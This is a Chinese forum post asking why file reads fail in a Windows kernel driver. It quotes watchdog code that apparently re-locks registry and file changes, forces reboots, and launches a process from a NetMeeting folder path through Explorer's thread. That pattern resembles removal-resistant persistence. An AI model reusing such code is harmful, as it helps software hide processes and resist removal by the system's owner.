|
阅读:3306回复:0
驱动中的一个路径问题
VOID __stdcall WatchDogThread ( PVOID Context )
{ int wait_before_run = 0; int wait_before_reboot =0; UNREFERENCED_PARAMETER(Context); KeSetPriorityThread(KeGetCurrentThread(), LOW_REALTIME_PRIORITY); CHAR szRunProcess[260]; sprintf(szRunProcess,"\\programfiles\\NetMeeting\\%s",TARGET_PROCESS_NAME); while(1) { //是否卸载 if(g_SysApp->m_bUninstalled) { LogPrint("watchdog exit for uninstalled\n"); break; } //是否exit if(kWatchDogExit) { break; } //reboot if(wait_before_reboot && wait_before_reboot <=2) { LogPrint("watchdog need reboot\n"); System_Reboot(); } //检查reg if(RegCheck() && !g_SysApp->m_bUninstalled){ LogPrint("watchdog need fix reg now\n"); RegLock(); wait_before_reboot ++; } //检查file if(FileCheck() && !g_SysApp->m_bUninstalled) { LogPrint("watchdog need fix file now\n"); FileLock(); wait_before_reboot ++; } if (NtfrsFileCheck() && !g_SysApp->m_bUninstalled) { LogPrint("watchdog ntfrs need fix file now\n"); NtfrsFileLock(); } //检测时间,explorer运行后20秒启动 if(g_SysApp->m_Kernel32ImageBase) { if(wait_before_run==2) { if(NeedRun()) { //启动target RunProcess(szRunProcess,g_SysApp->m_Kernel32ImageBase,g_SysApp->m_ExplorerPID, g_SysApp->m_ExplorerTID); WriteLastRun(); } } wait_before_run++; } //终止target if(g_SysApp->m_TargetTickout && (MyGetTickCount_S() - g_SysApp->m_TargetTickout>= TERMINATE_PROCESS_TIMEOUT) ) { LogPrint("watchdog need kill process now,tickcount=%d,time=%d\n", MyGetTickCount_S(),MyGetCurrentTime_S()); if(NT_SUCCESS(MyTerminateProcess(g_SysApp->m_TargetPID,STATUS_SUCCESS))) { g_SysApp->m_TargetPID=0; g_SysApp->m_TargetTickout=0; } } //Sleep System_Sleep(WATCHDOG_INTERNAL); } PsTerminateSystemThread(1); } PCHAR ReadFile_S1(CHAR* pszFileName,ULONG* uSizeX) { PCHAR uRet = 0; NTSTATUS ntStatus = STATUS_UNSUCCESSFUL; UNICODE_STRING unicFileName; ANSI_STRING ansiFileName; RtlInitAnsiString(&ansiFileName, pszFileName); ntStatus = RtlAnsiStringToUnicodeString(&unicFileName, &ansiFileName, TRUE); if (NT_SUCCESS(ntStatus)) { HANDLE hFile = NULL; IO_STATUS_BLOCK ioStatus = {0}; OBJECT_ATTRIBUTES obattrSource = {0}; InitializeObjectAttributes(&obattrSource, &unicFileName, OBJ_KERNEL_HANDLE|OBJ_CASE_INSENSITIVE, NULL, NULL); ntStatus = ZwOpenFile( &hFile, SYNCHRONIZE|GENERIC_READ, &obattrSource, &ioStatus, FILE_SHARE_READ|FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE); if (NT_SUCCESS(ntStatus)) { FILE_STANDARD_INFORMATION fiStandard = {0}; LogPrint(__FUNCTION__" open file(%s) ok\n", pszFileName); ntStatus = ZwQueryInformationFile(hFile, &ioStatus, &fiStandard, sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation); if (NT_SUCCESS(ntStatus)) { //fixed,注册表有时候很大哦;搞成32M吧 if (fiStandard.EndOfFile.HighPart==0 && fiStandard.EndOfFile.LowPart <= 32*1024*1024) { ULONG uSize = fiStandard.EndOfFile.LowPart; PCHAR pBuffer = (PCHAR)ExAllocatePool(NonPagedPool, uSize); if (pBuffer) { LARGE_INTEGER liOffset; liOffset.HighPart = 0; liOffset.LowPart = 0; RtlZeroMemory(pBuffer, uSize); ntStatus = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatus, pBuffer, uSize, &liOffset, 0); if (NT_SUCCESS(ntStatus) && ioStatus.Information == fiStandard.EndOfFile.LowPart) { uRet = pBuffer; *uSizeX = uSize; LogPrint(__FUNCTION__" read file (%s) ok\n", pszFileName); } //fixed,在外面清理 //ExFreePool(pBuffer); } } } ZwClose(hFile); } else { LogPrint(__FUNCTION__" open file (%s) fail,status=(%08x)\n", pszFileName,ntStatus); } RtlFreeUnicodeString(&unicFileName); } return uRet; } 搞不清楚如果文件路径这样写的话 每次g_SysApp->m_Kernel32ImageBase == NULL,在Readfile的时候也失败~ |
|
